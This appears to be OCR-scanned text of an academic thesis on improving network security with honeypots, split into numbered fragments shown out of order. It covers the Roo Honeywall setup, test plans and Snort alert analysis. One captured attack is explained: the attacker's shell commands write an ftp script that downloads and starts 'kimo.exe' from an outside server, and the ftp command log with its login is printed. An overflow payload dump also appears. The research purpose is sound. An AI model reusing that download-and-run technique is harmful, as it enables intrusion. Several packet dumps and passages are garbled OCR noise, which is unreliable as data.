48. Passwd for user Passwd for Root Run SSH at Startup Yes No Start SSH now Yes No Inbound Access to Mgmt Interface eth2 Allowed inbound TCP ports IP addresses that can access mat interface Walleye Web GUI Enable Walleye Yes No Outbound access from Mgmt Interface eth2 TCP ports gateway can initiate outbound UDP ports gateway can initiate outbound Page B 30 Improving network security with Honeypots 3 Third Section 3 1 Honeypot Outbound Control Limits e Second minute hour day month e TCP limit e UDP limit e ICMP limit e Other limit e Send packet through Snort Inline Yes No e Drop Reject Replace Ruleset 3 2 Logging exclusions e name of blacklist file or default def etc blacklist txt e name of whitelist file or default def etc whitelist txt e Enable blacklist and whitelist filtering Yes No 3 3 Outbound traffic exclusions name of fencelist file or default def etc fencelist txt e Enable fencelist filtering Yes No e Enable roach motel mode Yes No 4 Fourth Section 4 1 DNS for Honeypot Often you want to allow the honeypots unlimited access to specific DNS servers so they can maintain resolution without filling up your outbound connection limits e Allow honeypots to access DNS unrestricted Yes No e Which honeypot s can access DNS unrestricted e Which DNS servers do they have unrestricted DNS access to 4 2 Email Alerts The system has the ability to email infor
49. R002 Time intervals are normal Need This ensures that the clock of the computer or virtual machine is using time intervals according to the Sl definition Unit of time second BIPM 98 Page 36 EX Attain R003 Need EX Attain Improving network security with Honeypots On one of the virtual machines during the experiments the time interval was at half speed This means that after one minute in real time the clock in the virtual machine showed only 30 seconds passed After one day the machine displayed only 12 hours passed since the last check Cases like this are not to be tolerated Roo uses the ntp protocol RFC 2030 for time synchronization Please see the man page for the use of the ntp daemon man ntpd For Germany the Physikalisch Technische Bundesanstalt offers time synchronization services via radio transmission Priester 04 public telephone dial in according to the European Telephone Time Code Kirchner 93 and ntp Several receivers exist which can be attached on local COM ports Honeypot is able to establish outbound and inbound connections to the internal network Honeypot is able to access the internal network in both directions In several cases this requirement could not be satisfied The cabling on a real Honeywall could be wrong the firewall on Roo could be out of service the VMware network devices VMnetO and VMnet8 could be interchanged VMware Bridge Protocol could be ac
50. SSI eA Tee TTE IpLen 20 DgmLen 40 DF EXKARARE Sega OxXSLAGZDGE Ack OxZB4 D9CZ Win Honeypots T29 7T95 0x2 1D 123 0x4380 TcpLen 20 SMBs 4 4 4 4 4 4 4B 50 AA 22 type 0x800 124 TOS T0x0 ID 1090 OXFCAO Tcplen 20 4 4 4 4 4 4 CoCr DOr TO Eype 0xs00 128 TOS 030 ID 127 0x4380 TcpLen 20 4 4 4 4 4 4 4 4 4B 50 AA 22 type 0x800 124 TIS20x0 LD SL OXFCAO Tcplen 20 4 4 4 4 4 4 Page B 27 Improving network security with Honeypots B 3 Setup instruction sheet Initial Setup During the Initial Setup process you will have to answer the following questions By identifying these questions now such as hostname IP addresses use of Snort and Snort Inline you can make your deployment a hopefully smoother and simpler process This document is intended for you to fill out the answers before the actual deployment The series of questions below are based on deploying a layer two bridge gateway There will be several additional NAT questions if you enable a layer three routing gateway Setup Description lf you have more than one Honeywall running you can assign it a name Note that this name is for your own identifying uses it does not appear in the actual setup Name e Date of Setup e Roo Version e PC or VMware installed e Comments Page B 28 Improving network security with Honeypots 1 First Section 1 1 I
51. abilities figure 4 7 list of roo s components eeyore was replaced by Roo details can be found on http www honeynet org tools cdrom eeyore download htmil Fedora is RedHats Open Source distribution http www fedora com Page 33 Improving network security with Honeypots Sebek Sebek is a data capture tool designed to capture the attacker s activities on a Honeypot without the attacker knowing it It is based on Rootkit technologies which hide the presence of Sebek to logged on users menu Graphical menu developed by the Honeynet Project to maintain and control a running Honeywall Walleye Web based monitoring and maintenance tool Packet capture interface to the Linux kernel Web server daemon to publish websites to a network pof A passive OS network fingerprinting utility for use in IDS environments Honeypots environments firewalls and servers Argus is a real time flow monitor that is designed to perform comprehensive IP network traffic auditing iptables Iptables is a Linux firewall integrated into the kernel It is a generic table structure for the definition of rulesets Each rule within an IP table consists of a number of classifiers iptables matches and one connected action iptables target swatch Alerting tool Swatch is used to monitor log files When it sees a line matching a pattern specified it can highlight it and print it out or run external programs to notify through mail or some other me
52. allocation the memory is allocated from a large pool of unused memory called the heap dynamically As variables can be added and removed dynamically the upper limit of the heap is moving up or down Stack memory is allocated at higher address ranges It contains automatic variables and jump addresses Similar to the heap the size grows and decreases during run time But in contrast to the heap it starts at a high address and grows down to the lower addresses Page 47 Improving network security with Honeypots oe OxFF46 oe AA OxFF14 wi stack a i end of sub routine return to main program MN ds T sub routine instructions l start of sub routine a end of main program code EN area 0x1234 point of return for sub routine main 0x1233 jump to sub routine program main program instructions start of main program 0x1000 figure 5 5 memory usage of a process To know which instruction has to be executed the Intel architecture uses an instruction pointer IP This is a reserved register which points at the address of the next instruction Page 48 Improving network security with Honeypots Code execution starts at the code area at the lowest address and iteratively moves to the next higher directive 1 IF a sub routine is to be called a jump call instruction 2 with an address pointing to the sub routine s code is executed This stores the address 13 of the instruction pointer to the stack
53. and the corresponding server responses client command server response lt opened a connection to server gt 220 PRIVATE SERVER USER whOre 331 User name okay need password PASS gotfucked 230 User logged in proceed TYPE I 200 Type set to I PORT 292 160 10 39 4 11 200 PORT Command successful RETR kimo exe 150 Opening BINARY mode data connection for kimo exe 78970 Bytes 421 Connection timed out closing figure 5 20 ftp commands The FIP specifies two mechanisms for establishing transfer connections the active mode and the passive mode RFC 959 In the active mode the connection is initiated from the server to the client with the IP and port number from the PORT command and in passive mode the connection is initiated from the client to the server The reason for the failure is the private IP address sent in the PORT command The private address is not accessible from the public internet therefore the Page 60 Improving network security with Honeypots server is attempting to connect to an address which is not routed back to the Honeypot To circumvent this it would have been necessary to use passive mode But unfortunately for the attacker ftp exe does not support this feature This example shows why it is necessary to differ between scenario 3 and scenario 4 In scenario 3 the download would have succeeded because there the Honeypot is assigned a public routable IP address But as seen in this
54. ans figure 4 7 list of roo s components continued 4 5 Choosing the bait The Anti Virus software producer Kaspersky publishes a monthly ranking of currently active Viruses and other malware In the Top 20 ranking for December Kaspersky 05 2004 published on January 01 2005 every virus targets on a Win32 platform Observing the rankings back until April 2005 results the same target Therefore Windows 2000 and Windows XP were chosen for the Honeypot Rootkit A rootkit is a set of tools used by an intruder after hacking a computer system These tools can the attacker maintain his access to the system A Root kit typically hides its presence to the user Page 34 Improving network security with Honeypots 5 Running and observing the experiment From March to June several Honeypot experiments were realized The challenge was to set up a working scenario and extract useful information Chapter 5 1 deals with problems of a safe setup and presents requirements for test cases to avoid failures The proposed test concept is based on experience gained from the realization phase Chapter 5 2 describes what can be attacked from the internet Chapter 5 3 explains log analysis with Roo in general Actual log results are presented in chapter 5 4 5 1 Requirements to a safe setup The worst case was when a running setup turned up with an error and made the captured data worthless This made many results almost useless and wasted a lot
55. ara DU e 32 10 06 23 82 10 682 03 82 02 101 200 41 al 4 Al Eo Deo AAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAA Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAA Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAA Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA Page B 19 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
56. athering It is also the border between a low interaction and a high interaction Honeypot A high interaction Honeypot such as a Honeynet provides detailed data of how an attack happened whereas a low interaction Honeypot would not give every detail of the attack The reason for this is the type of response from the Honeypot As discussed in chapter 2 4 1 a low interaction Honeypot does not provide full functionality of the emulated service Honeynets use full working operating systems as Honeypot therefore any functionality of the operating system is provided This allows analyzing the attack in every detail Roo provides several logs and dumps of captured traffic which can be analyzed firewall logs iptables logs every connection in a summarized form including date time protocol Source IP Destination IP IP header details TTL etc network binary logs network captures These are the actual packets captured by the protocol sniffer of snort Contained is the full packet including header and payload Roo stores network binaries in the tcpdump format which can be read by several tools such as tcpdump Snort or Ethereal figure 5 8 log types of Roo Page 52 Improving network security with Honeypots ASCII session logs Sometimes it is more interesting to read only the payload of a full connection and not only from a single packet ASCII session logs can be used i e to retrieve transferred files to the Hon
57. be aware of this risk and therefore control the Honeypot on a regular basis 3 6 Scenario VI Honeypot out of the box A Honeypot out of the box is a ready to use solution which also could be thought as a commercial product The question is which features are needed As showed in the previous chapters there is a wide range of eventualities A complete product needs to cover security hide from the attacker good analyzability easy access to captured data and automatic alerting functions to be sufficient 3 6 1 Secure usage of a Honeypot A running Honeypot may not in any circumstances touch production machines This is the highest goal of securing a Honeypot Otherwise a compromised Honeypot would allow taking over sensible data and machines Actually a compromised Honeypot should not be able to touch any other machine than the one which infected it but this would decrease the Honeypots value to Dos Denial of Service attack on a computer system or network that causes a loss of service to users typically the loss of network connectivity and services by consuming the bandwidth of the victim network or overloading the computational resources of the victim system DDoS distributed Denial of Service attack the victim is attacked by several compromised machines at the same time In contrast to DoS attacks where only one device launches the attack Page 17 Improving network security with Honeypots attackers In some
58. e which gives definitions on Honeypot terms and notions Unfortunately it is not clear who founded the term Honeypot Spitzner s book lists some early Honeypot solutions but none of these had Honeypot in their name 2 3 Types of Honeypots To describe Honeypots in greater detail it is necessary to define types of Honeypots The type also defines their goal as we will see in the following A very good description on those can also be found in Spitzner 02 2 3 1 The idea of Honeypots The concept of Honeypots in general is to catch malicious network activity with a prepared machine This computer is used as bait The intruder is intended to Page 3 Improving network security with Honeypots detect the Honeypot and try to break into it Next the type and purpose of the Honeypot specifies what the attacker will be able to perform Often Honeypots are used in conjunction with Intrusion Detection Systems In these cases Honeypots serve as Production Honeypots see 2 3 2 and only extend the IDS But in the concept of Honeynets see 2 3 4 the Honeypot is the major part Here the IDS is set up to extend the Honeypot s recording capabilities External Network Firewall 192 168 10 254 Local Area Network 192 168 10 0 24 amp Production PC Production PC Production PC Honeypot 192 168 10 1 192 168 10 2 192 168 10 3 192 168 10 4 figure 2 1 deployment scenario of a single Honeypot A common setup is to d
59. ected RPC scan So it is likely to be a scan as it did not appear alone Port 445 microsoft ds also seems to gather a large number of alerts Roo Mue Win2000 reads 14 03 flows and 32 49 alerts 1 2 and Roo Mue WinXP reads 23 46 flows and 14 55 3 2 alerts Here the ratio of flows on Roo _Mue Win2000 is less than the alerts while on Roo _Mue WinXP the ratio of flows is more than the ratio of alerts This means that the alerts caused on Windows 2000 had a higher priority than on Windows XP So this port is more critical to security on Windows 2000 Windows XP seems to be most vulnerable on port 139 netbios ssn Here only 6 55 flows caused 59 43 1 9 alerts On Windows 2000 1 73 flows caused 5 58 1 3 alerts Looking at the values of Roo_Die shows that there is no traffic on ports 135 and 445 obviously these are blocked by the firewall Hence it is very conspicuous that 3 85 traffic But it is difficult to compare that result with the preceding The experiment at Dieburg captured data for 6 days and the ratio of 3 85 traffic was caused by 5 flows Four of these flows occurred on May 26 between 6 06 36 pm and 06 06 56 pm The fifth flow arrived at the same day but at 01 01 00 am It is likely that the firewall was maintained at this time Page 64 Improving network security with Honeypots Roo_Die reads 85 37 alerts on port O broadcast Checking the logs shows that those alerts were caused by ICMP messages All
60. ed according to 3 3 4 3 12 3 Execution 29 login to Walleye AE 50 observe flow from lt hpIP gt to 0 0 0 0 to port 1101 Pass Fail 51 open this flow by clicking on the magnifying glass 52 Verify that the contents of this flow show the execution of Pass Fail ping lt attlP gt 3 12 4 Verification Verify that R012 Sebek is running is satisfied with step 52 3 12 5 Results Summary Date Time Pass Fail Page B 18 Improving network security with Honeypots B 2 Packet payload example of chapter 5 3 2 06 2947 33525 DIOS 83 0220205287700 36 gt 021702727507 AA 8 22 Lype 0x2800 len 0x3A SA lO gt LL LOS ls e 2445 er ZA TOS 030 ID 996 IpLen 20 DgmLen 44 DF APA APTE Gegi OxSIA6ICCE Ack OxZB4 D99A Win OxFCC TepLen 20 JO 005 40 BE _ 4 4 4 4 ee ee ee ee ee ee ee ee ee eee 067 23211255552 156601 05 A0 ES 3C12D 8 76 gt 10519222 55022222 type 0x6 00 len 0x5D6 64 DOLO il a OS SS LIL LOS LOS Sores ECP SITE 22 POS 0x0 TD 2 A7 IpLen 20 DgmLen 1480 DF AREA BREAES Geg OXSLAOLCCR Ack 0x2B47D99A Win Oxi CCy Tepben 20 EE 28 AD AZ 73 209 DU 20 0 DI LS 207 EI IE DEN lt M BSis 8 nt cc aa 00 00 OOP 00 2008 09V YO 00 0037 ds 00 02 0 BU aaa EEEE UG EE O0 00 00 DE TLE JA DO 001 1005 00 BI HOS SOO WE os ae LO OG 00 0g OO DA 00 00 8 00 E19 5922 IE TA OG da we ner UG 2B 0 60 UL Do 05 02 2082 ALO RE 30 102 LO DA AL
61. emon UNIX system or daemon term is a particular class of computer program user context that runs in the background rather than under the direct control of a user They provide system support services which are not directly handled by the Kernel i e Local Security Authority Subsystem Service LSASS is a process in Microsoft Windows operating systems that verifies the user logging on to a Windows computer or server application This can be any user initiated program using user context network functions i e mail client or http browser figure 5 4 possible networking processes Important in regard to security are security privileges In general we can distinguish two categories system privileges and user privileges System privileges are as implied by the name used by the system kernel and closely related services They provide basic functioning of the operating system and communication facilities System privileges include full access to the entire operating system User privileges are limited to the user s working space This includes memory disk space and access to system functions With these limitations it is not possible to damage the operating system or delete data which does not belong to the user In general this also includes the privilege of installing programs or device drivers Of course a user can be assigned single privileges which could include installing rights but this is configuration dependent Another
62. eploy a Honeypot within a production system The figure above shows the Honeypot colored orange It is not registered in any naming servers or any other production systems i e domain controller In this way no one should know about the existence of the Honeypot This is important because only within a properly configured network one can assume that every packet sent to the Honeypot is suspect for an attack If misconfigured packets arrive the amount of false alerts will rise and the value of the Honeypot drops Page 4 Improving network security with Honeypots 2 3 2 Production Honeypot Production Honeypots are primarily used for detection see 2 6 2 Typically they work as extension to Intrusion Detection Systems performing an advanced detection function They also proove if existing security functions are adequate i e if a Honeypot is probed or attacked the attacker must have found a way to the Honeypot This could be a known way which is hard to lock or even an unknown hole However measures should be taken to avoid a real attack With the knowledge of the attack on the Honeypot it is easier to determine and close security holes A Honeypot allows justifying the investment of a firewall Without any evidence that there were attacks someone from the management could assume that there are no attacks on the network Therefore that person could suggest stopping investing in security as there are no threats With a Honeypot there is
63. eriment based on Scenario triggered an average of 7 flows per minute see appendix B 4 rec June 12 2005 the mailbox was soon flooded with mails This shows that alerting mechanisms need to be adjusted according to the demands of the environment Page 20 Improving network security with Honeypots Traffic which exceeds outbound limits can also be used as a trigger This would add more level of detail to the alert Also protocols other than TCP or UDP should trigger an alert The protocol value in the IP header provides this i e TCP has the value 6 decimal and UDP 17 decimal Values other than those are symptoms of unknown attacks and could be used to bypass firewall rules In case of accepted outbound traffic the alert mechanism needs to be trained with patterns of valid traffic But the other way round when an attacker has found a new way to exploit vulnerabilities which are not recognized an important alert would be missing A solution which focuses on detecting patterns only would not be adequate 3 7 Scenario V knowledge education A Honeypot needs a basic understanding of networks and protocols i e the function of initiating a TCP connection with a TCP handshake RFC 793 or the concept of subnetting RFC 791 But a Honeypot is also a good tool to learn to delve into the functionality of a network and also to gain knowledge of how flaws are actually exploited 3 7 1 Personal experience From examining the ca
64. ess firewall restrictions located at the branch department in Dieburg For the setup at FHD the Barebone computer is used As only one physical machine is available VMware workstation 4 5 2 is used to emulate two virtual machines for Honeywall and Honeypot VMware Workstation is powerful desktop virtualization software for emulating virtual PCs The software allows users to run multiple x86 based operating systems including Windows Linux and NetWare and their applications simultaneously on a single PC The basic version allows the operation of four machines at the same time Further those machines can be interconnected by one or more virtual networks Virtual machines emulate a set of hardware devices There is audio USB and network support Each device can be manually added or removed by the user i e for the Honeywall virtual machine removed audio support to save resources The guest operating system is not aware of the emulated environment and drivers are installed as they would on a real computer Virtual network cards are created with two endpoints one for the host and one for guest operating system Each endpoint holds its own IP this allows establishing a connection between real and virtual environment lt is also possible to have a connection between two virtual machines In this case it is advisable to remove the IP on the host computer or the host might participate in the connection On Windows XP this is realized by
65. esults sort by source packets cooccccocnccncnncncnnonanonnnnnonanonnannnnnnns 62 figure 5 24 protocol descriptiON ccooccccconncccnnoccnnonannnonnnonannnnannonannnnannnnanos 63 figure 6 1 flow with multiple alertS ooccoooccconcconnoconoconcconnonononanonannnnons 66 Page iii Improving network security with Honeypots 1 Why do Honeypots improve network security Honeypots turn the tables for Hackers and computer security experts While in the classical field of computer security a computer should be as secure as possible in the realm of Honeypots the security holes are opened on purpose In other words Honeypots welcome Hacker and other threats The purpose of a Honeypot is to detect and learn from attacks and use that information to improve security A network administrator obtains first hand information about the current threats on his network Undiscovered security holes can be protected gained by the information from a Honeypot Wikipedia Wikip 05 defines a Honeypot as a trap set to detect or deflect attempts at unauthorized use of information systems A Honeypot is a computer connected to a network It can be used to examine vulnerabilities of the operating system or network Depending on the setup security holes can be studied in general or in particular Moreover it can be used to observe activities of an individual which gained access to the Honeypot Honeypots are a unique tool to
66. et in this case to the file cdtime asp To append lines to the file the operator gt gt Is used The operator amp is used to concatenate the eight commands The first five commands create an ftp command script with the name catime asp lt contains the IP and port of the ftp server 205 177 75 76 58739 username whOre password gotfucked transfer mode binary file name kimo exe and finally it closes the connection bye Then ftp exe is used to download the file kimo exe Option n specifies that automatic logon after connection establishment is suppressed Then the script is deleted to wipe the trace Page 59 Improving network security with Honeypots The command start is used to decouple kimo exe from the shell and have it run in its own context This is important other while the executable would be visible under the process context of cmd exe Unfortunately the ftp download did not succeed The connection to the server was established but the file was not downloaded Also very interesting is that Snort did not recognize the ftp connection and did not trigger an alert This was because all ftp related snort rules check for overflow attempts and do not trigger on valid ftp connections une 23rd 17 05 56 00 02 02 192 168 10 39 205 177 75 16 f TCP 1034 O kB 15 pkts gt 58739 EE FIN Windows 0 kB 10 pkts figure 5 19 ftp flow Below are the ftp commands sent
67. example scenario 4 is more secure 5 4 Data analysis from Roo_Die and Roo_Mue The here presented results give a short overview about attacks Unfortunately the amount of values is rather small Both captures from Roo_Mue were recorded within duration of 24 hours in the same environment Different is the day of capture and the operating system on the Honeypot the first setup used Windows 2000 and the second Windows XP details see 4 3 The setup and the environment of Roo_Die was totally different Roo_Mue was set up with Scenario and IV while Scenario Il and Ill were basis for Roo_Die sort by flows 100 80 a 50 12 E w c E 40 20 0 amp S FSS SF OC LES Ss we Se sf ye y as p Sl Ef g Se CF ENE SL ee ps a ye Ni 2 y TCPIUDP port figure 5 21 results sort by flows Page 61 Improving network security with Honeypots Snort defines a flow as unique when the IP protocol source IP source port destination IP and destination port are the same The above chart sorts the detected flows by their corresponding destination ports sort by alerts 100 80 50 appearance 40 20 0 TCPIUDP port figure 5 22 results sort by alerts snort triggers an alert when a rule has detected a flow which matched a predefined pattern see figure 5 16 for an example of Snort rules Alerts are rated with a numerical value starting at 1 and increasing with the severity It is poss
68. ey and Sons Inc 2000 Jim Norton et al Common Internet File System CIFS Technical Reference Revision 1 0 The Storage Metworking Industry Assiciation 2002 author unknown Snort User s Manual 2 3 3 Sourcefire Inc 2005 Lance Spitzner Honeypots Tracking Hackers Addison Wesley 2002 Clifford Stoll The Coocoo s egg Pocket Books 1990 The UPnP Forum UPnP Device Architecture Version 1 0 The UPnP Forum 2000 various authors Wikipedia the free encyclopedia http www wikipedia org last request June 05 2005 Vinod Yegneswaran Paul Barford Somesh Jha Global Intrusion Detection in the DOMINO Overlay System University of Wisconsin Madison 2004 Improving network security with Honeypots B Appendix B 1 List of Test Cases 1 Test Cases for aRoo Honeywall setup 1 1 Purpose This document describes a system test plan to verify the functionality of a default installation of Roo 138 meaning no extra software or versions other than provided on the Roo 138 release are installed This test plan assumes that the Hardware on the target computer is functioning without conflicts or misconfigurations 1 2 Setup For all tests we will need the following setup 1 3 Software and hardware installation Hardware installation is documented in Roo_Setup_descr doc Software installation is documented in Roo_Setup_descr doc Honeywall configuration is documented in Roo_InitialSetup_short doc All software is f
69. eypot without touching the Honeypot snort alerts Snort alerts summarize flows and categorize them by alerts The alerts are detected by pattern analysis of the packets payload Discovered alerts are further rated by the severity of the attack with a number figure 5 8 log types of Roo Most informative are the snort alerts They categorize the flows by classtypes and priorize them An example looks like this 1 538 14 NETBIOS SMB IPCS unicode share access Classification Generic Protocol Command Decode Priority 3 O5 26 20404255 2559 7937 2222191 16 54317752 gt 121 1700 2383 74 21 39 LEP TIG 102 TOS 0x0 ID s541275 tplen 20 Banken2138 DE XXAP X Seq Ox565C48BE Ack OxEEOA61D4 Win Ox3EEl Tcplen 20 figure 5 9 Snort alert example The numbers in the first line provide identification purposes The first number indicates which parsing engine in Snort terms generator detected the alert The second number is the identifier for this alert Snort ID and the third number shows the revision of the rule Next is a textual description of the alert in the above example someone accessed the inter process communication share of a Windows operating system In the next line Snort prints a classification and a priority The higher the priority is the more severe the alert In figure 5 9 a priority of 3 is low The following figure shows a few examples of Snort classtypes Page 53 Improving netwo
70. gin is accepted Pass Fail 3 8 4 Verification Verify that R008 Walleye activated is satisfied with step 37 3 8 5 Results Summary Page B 14 Improving network security with Honeypots 3 9 Test Case 9 Walleye time 3 9 1 Purpose Verify that requirement R009 has been satisfied and Walleye is displaying the chosen time 3 9 2 Setup Precondition Setup is the same as in 3 8 Walleye activated R008 needs to be satisfied according to 3 8 3 9 3 Execution 38 login to Walleye Py 39 Verify that time displayed in the upper right corner is Pass Fail corresponding to your chosen time 3 9 4 Verification Verify that R009 Walleye time is satisfied with step 39 3 9 5 Results Summary Date Time Pass Fail Page B 15 Improving network security with Honeypots 3 10 Test Case 10 Walleye is displaying traffic from R003 3 10 1 Purpose Verify that requirement R010 has been satisfied and Walleye is displaying traffic from R003 3 10 2 Setup Precondition Setup is the same as in 3 1 8 Walleye activated R008 needs to be satisfied according to 3 8 4 3 10 3 Execution 40 login to Walleye EEE 41 on start screen click on last 1 hour 42 on screen displaying aggregated flows select Detailed on A view 43 click button send request 44 verify that there is a flow from lt attlP gt to lt hplP gt using Pass Fail protocol ICMP 45 verify that there
71. h Honeypots 3 7 Test Case 7 Honeywall is logging traffic 3 7 1 Purpose Verify that requirement R007 has been satisfied and the Honeypot is logging traffic from inbound and outbound traffic 3 7 2 Setup Precondition Setup is the same as in 3 3 internal IP functionality R003 needs to be satisfied according to 3 3 4 3 7 3 Execution 28 on Honeywall login as Root I 29 enter menu 30 select 1 Status 31 select 11 Inbound Connections 32 Verify that there are 4 entries from lt attlP gt to lt hplP gt with Pass Fail Protocol ICMP 33 select 12 Outbound Connections 34 Verify that there are 4 entries from lt hplP gt to lt attlP gt with Pass Fail Protocol ICMP 3 7 4 Verification Verify that R007 Honeywall is logging traffic is satisfied with steps 32 and 34 3 7 5 Results Summary Date Time Tester Pass Fail Remarks Page B 13 Improving network security with Honeypots 3 8 Test Case 8 Walleye activated 3 8 1 Purpose Verify that requirement R008 has been satisfied and the Honeypot is logging traffic from inbound and outbound traffic 3 8 2 Setup Precondition Setup is the same as in 3 3 internal IP functionality R003 needs to be satisfied according to 3 3 4 3 8 3 Execution 35 on attacker computer open http browser enter https lt manlP gt walleye pl 36 on Honeywall login enter username and password 37 Verify that lo
72. he source port In this case the variable was set in etc hflowd snort snort conf to 180 which includes all ports from 1 to 65536 except port 80 Rule header indicates the direction of the traffic that the rule applies to Here the connection must have come from the external network SHOME_NET Rule header variable specifying information about the destination address In this case the variable was set by Roo s menu to 192 168 10 0 24 rule header specifies possible source ports msg Rule option tells the logging and alerting engine the message to print along with a packet dump or to an alert content Rule option allows the user to set rules that search for specific content in the packet payload and trigger response based on that data classtype Rule option categorizes alerts to be attack classes sid Rule option used to uniquely identify Snort rules Used to uniquely identify revisions of Snort rules figure 5 17 details of a Snort alert A complete description of Snort rule details can be found in Sourcefire 05 The rule was triggered because it discovered the content CCCCCCCCCCCC CCCCCCCCCCCC two times An inspection of the packet payloads shows that this happened in the fourth and fifth packet The complete dump of the payload is attached in the appendix see B 2 Page 58 Improving network security with Honeypots As explained in chapter 5 2 2 when overwritten the return addre
73. ible that more than one alert is triggered per flow sort by SRC packets 130 30 30 appearance 40 9 2U Yo y BY eo amp 3 gt P S A S gt 2 S a e a Si r e St E S e E S E FF amp g 5 E Ed N amp AS P of SF ge ape i gt DO O N TCP UDP port figure 5 23 results sort by source packets Page 62 Improving network security with Honeypots The above figure shows the ratio of bytes sent per port In this case the values are a quantitative indication of traffic 135 epmap Microsoft DCE Locator service end point mapper for Remote Procedure Calls 138 netbios dgm NETBIOS Datagram Service used for sending messages via the command utility net send RFC 1002 445 Microsoft ds Microsoft DS NETBIOS over TCP IP see Microsoft 02 137 netbios ns NETBIOS Name Service RFC 1002 53 domain Domain Name Service DNS protocol RFC 1035 O broadcast used by the Kernel to send broadcast messages 69 tftp Trivial File Transfer Protocol RFC 1350 6667 ircd Internet Relay Chat Protocol RFC 1459 O http Hyper Text Transfer Protocol RFC 2616 139 netbios ssn NETBIOS Session Service RFC 1002 1443 ms sql s Microsoft SQL Server standard port for listening for SQL queries 1434 ms sql m Microsoft SQL Monitor SQL Server uses UDP port 1434 to establish connections from SQL Server 2000 clients figure 5 24 protocol description Taking a
74. igated in this document is the infection via network This method uses known vulnerabilities in network software for injecting worm code see 5 3 2 Page 2 Improving network security with Honeypots 2 2 History of Honeypots The concept of Honeypots was first described by Clifford Stoll in 1990 Stoll 90 The book is a novel based on a real story which happened to Stoll He discovered a hacked computer and decided to learn how the intruder gained access to the system To track the hacker back to his origin Stoll created a faked environment with the purpose to keep the attacker busy The idea was to track the connection while the attacker was searching through prepared documents Stoll did not call his trap a Honeypot he just prepared a network drive with faked documents to keep the intruder on his machine Then he used monitoring tools to track the hacker s origin and find out how he came in In 1999 that idea was picked up again by the Honeynet project Honeynet 05 lead and founded by Lance Spitzner During years of development the Honeynet project created several papers on Honeypots and introduced techniques to build efficient Honeypots The Honeynet Project is a non profit research organization of security professionals dedicated to information security The book Honeypots Tracking Hackers Spitzner 02 by Lance Spitzer is a standard work which describes concepts and architectures of Honeypots lt is a competent sourc
75. igure 5 2 internet architecture extracted from RFC1122 43 QUES 5 3 Prolocol Sacando iia 45 figure 5 4 possible networking processes oooccccocccconoccconococonacoconncncnnncncnnncnnnnos 45 figure 5 5 memory usage O a PFOCESS ccooccccccccocccncnononononnnonnonanonancnnnnonanenaness 48 figure 5 6 stack filled with valid variables oooccconncccnnnconcnconcncnncncononnnnonons 50 figure 5 7 compromised Stack insin raner 51 Hure 5 6 100 1V DES OF ROO ario a E A 52 figure 5 9 Snort alert example ooccconccconccconccconccconccconnononccnoncononconanccnaninnos 53 Page ii NOU 5 10 SHOMCIASSIV DS a 54 figure 5 11 screenshot of Roo s detailed flow OuUtpul ccooccccccnccncnconcncnnos 55 figure 5 12 screenshot of Ethereal u0222020000200020n0nnnn nenn nenne nnnn nennen 55 Hure 9 19 S USPI COUS TOW nee ee 56 igure 5 14 DFODE CONNEEUON een 56 figure 5 15 full alert details ccococccconncconncconncconnnconcocannonannonannonannnnanos 57 figure 5 16 Snort rule for detecting shellcode ccccoocccoccnconcnccocncnncnnnnos 57 figure 5 17 details of a Snort alert oocccccnnncoccnnnoccnnnoconononanononnnnnnoncnononenoss 57 figure 5 18 extracted code stc 59 QUe 5319 NP MIWisrnrr ae evista 60 QUES 320 TO COMMANOS rt edad 60 figure 5 21 results SOM DY OWS suis aisla 61 foure 5 22 TESUIS SOM DY alud 62 figure 5 23 r
76. ing the bad guys out Normally this is accomplished by firewalls and well patched systems The value Honeypots can add to this category is small If a random attack is performed Honeypots can detect that attack but not prevent it as the targets are not predictable One case where Honeypots help with prevention is when an attacker is directly hacking into a server In this case a Honeypot would cause the hacker to waste time on a non sufficient target and help preventing an attack on a production system But this means that the attacker has attacked the Honeypot before attacking a real server and not otherwise Also if an institution publishes the information that they use a Honeypot It might deter attackers from hacking But this is more in the fields of psychology and quite too abstract to add proper value to security 2 6 2 Detection Detecting intrusions in networks is similar to the function of an alarm system for protecting facilities Someone breaks into a house and an alarm goes off In the realm of computers this is accomplished by Intrusion Detection Systems see 5 3 2 for an example or by programs designed to watch system logs that trigger when unauthorized activity appears Page 10 Improving network security with Honeypots The problems with these systems are false alarms and non detected alarms A system might alert on Suspicious or malicious activity even if the data was valid production traffic Due to the high netwo
